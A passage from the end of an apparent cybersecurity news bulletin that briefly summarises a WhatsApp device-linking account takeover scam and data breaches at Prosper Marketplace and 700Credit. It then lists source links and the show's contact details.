Avast documents an emerging WhatsApp account takeover scam abusing the platform’s legitimate device-linking feature. Attackers trick users into authorizing rogue linked devices through fake verification pages, granting persistent access to conversations without stealing passwords or triggering security alerts.

Finally, The Record reports major data breaches at Prosper Marketplace and 700Credit impacting nearly 20 million individuals. Exposed data includes Social Security numbers, financial records, and identity documents. Both incidents highlight ongoing systemic risks across the financial services supply chain.

Don't think, just patch!

Sources:
CVE-2025-59385: https://cvefeed.io/vuln/detail/CVE-2025-59385
CVE-2025-62848: https://cvefeed.io/vuln/detail/CVE-2025-62848
BPFDoor: https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html
CISA KEV: https://www.cisa.gov/news-events/alerts/2025/12/15/cisa-adds-two-known-exploited-vulnerabilities-catalog
WhatsApp scam: https://blog.avast.com/blog/onlinescams/whatsapppairingscam
Data breaches: https://therecord.media/data-breaches-affecting-20-million-prosper-700credit

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtintl.substack.com